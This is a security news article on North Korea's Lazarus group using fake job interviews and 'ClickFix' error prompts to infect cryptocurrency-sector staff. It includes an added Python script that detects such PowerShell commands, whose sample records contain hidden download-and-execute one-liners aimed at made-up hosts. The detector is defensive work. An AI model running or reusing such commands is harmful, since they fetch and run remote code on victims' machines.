Introduction
The infamous Lazarus group from North Korea has escalated its cyber attacks on the cryptocurrency sector by employing deceptive ‘ClickFix’ tactics to exploit job seekers, particularly in centralized finance (CeFi).
Evolution of Cyber Threats
According to a report by Sekoia, this strategy marks an evolution from the previous ‘Contagious Interview’ campaign, which targeted job applicants in AI and cryptocurrency sectors. The ClickFix method involves fake error messages on websites or documents that prompt users to execute harmful PowerShell commands, inadvertently installing malware.
Companies Impersonated in Recent Campaigns
- Coinbase
- KuCoin
- Kraken
- Circle
- Securitize
- BlockFi
- Tether
- Robinhood
- Bybit
The Mechanics of ClickFix Attacks
Earlier campaigns by Lazarus involved direct approaches to potential targets via platforms like LinkedIn or X, offering fake job opportunities that led to malware downloads. Starting in February 2025, the tactic shifted slightly to so-called ‘ClickFake’ campaigns, which retain elements of the initial phases but incorporate the self-infecting ClickFix strategy.
Profile of New Targets
The focus has now moved from developers to non-tech roles within CeFi organizations, such as business developers and marketing managers. These individuals are lured into remote interviews through seemingly legitimate ReactJS websites, which then exploit OS-specific vulnerabilities to install the GolangGhost backdoor malware.
Staying Safe from Cyber Threats
It’s vital for job seekers and organizations to stay alert and verify the legitimacy of any unusual interview requests or job opportunities. Always check the source, and never run unfamiliar commands from untrusted websites on your device.
Preventative Measures and Indicators of Compromise
Sekoia has released YARA rules to help organizations identify and block ClickFake activities. They’ve also shared a comprehensive list of indicators of compromise from Lazarus’s recent campaigns to aid in cybersecurity defenses.
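The Python triage below is an added example, not Sekoia's rules or code from the report. It flags process-creation records in which PowerShell was started from the desktop shell, fetches remote content, and then executes it or conceals itself, which is the kind of command a ClickFix prompt asks the victim to run. The record fields, regex patterns, the explorer.exe parent assumption, and all sample records are assumptions constructed for illustration.

```python
import re

# Traits of a pasted download-and-run command. These patterns are assumptions
# made for this example; they are not taken from Sekoia's YARA rules.
TRAITS = {
    "powershell": re.compile(r"\b(powershell|pwsh)(\.exe)?\b", re.I),
    "fetch": re.compile(r"\b(iwr|irm|invoke-webrequest|invoke-restmethod|curl|wget"
                        r"|downloadstring|downloadfile)\b", re.I),
    "remote_url": re.compile(r"https?://", re.I),
    "execute": re.compile(r"\b(iex|invoke-expression|start-process)\b", re.I),
    "concealed": re.compile(r"-w(indowstyle)?\s+h(idden)?\b"
                            r"|-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{16,}", re.I),
}
# Assumption: a command pasted into the Run dialog is spawned by the desktop shell.
INTERACTIVE_PARENTS = {"explorer.exe"}

def traits_of(cmdline):
    """Return the names of all traits whose pattern occurs in the command line."""
    return {name for name, rx in TRAITS.items() if rx.search(cmdline)}

def is_clickfix_like(event):
    """Flag user-started PowerShell that fetches remote content and then
    either executes it or conceals what it is doing."""
    t = traits_of(event["cmdline"])
    user_started = event["parent"].lower() in INTERACTIVE_PARENTS
    fetches = {"powershell", "fetch", "remote_url"} <= t
    return user_started and fetches and bool(t & {"execute", "concealed"})

def triage(events):
    """Return (host, sorted traits) for every event worth an analyst's look."""
    return [(e["host"], sorted(traits_of(e["cmdline"])))
            for e in events if is_clickfix_like(e)]

# Constructed process-creation records; hosts and domains are made up.
SAMPLE_EVENTS = [
    {"host": "WS-014", "parent": "explorer.exe",
     "cmdline": 'powershell -w hidden -c "iwr https://driver-fix.example.invalid/u.ps1 | iex"'},
    {"host": "WS-022", "parent": "explorer.exe",
     "cmdline": r"powershell.exe -File C:\Scripts\backup.ps1"},
    {"host": "BUILD-01", "parent": "jenkins.exe",
     "cmdline": 'powershell -c "iwr https://repo.example.invalid/tool.zip -OutFile tool.zip"'},
    {"host": "WS-031", "parent": "Explorer.EXE",
     "cmdline": 'powershell.exe -NoP -WindowStyle Hidden -Command '
                '"irm http://support-check.example.invalid/fix | Invoke-Expression"'},
]

if __name__ == "__main__":
    for host, traits in triage(SAMPLE_EVENTS):
        print(f"{host}: {', '.join(traits)}")
```

A hit is a lead for an analyst, not a verdict: legitimate shortcuts and admin tooling can match the same traits, so correlate with the indicators of compromise Sekoia published.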
Conclusion
As North Korean hackers continue to refine their malicious strategies, staying informed and vigilant is paramount. By understanding and reacting to the evolving tactics, both individuals and organizations can better protect themselves from these cyber threats.
Last Updated: March 31, 2025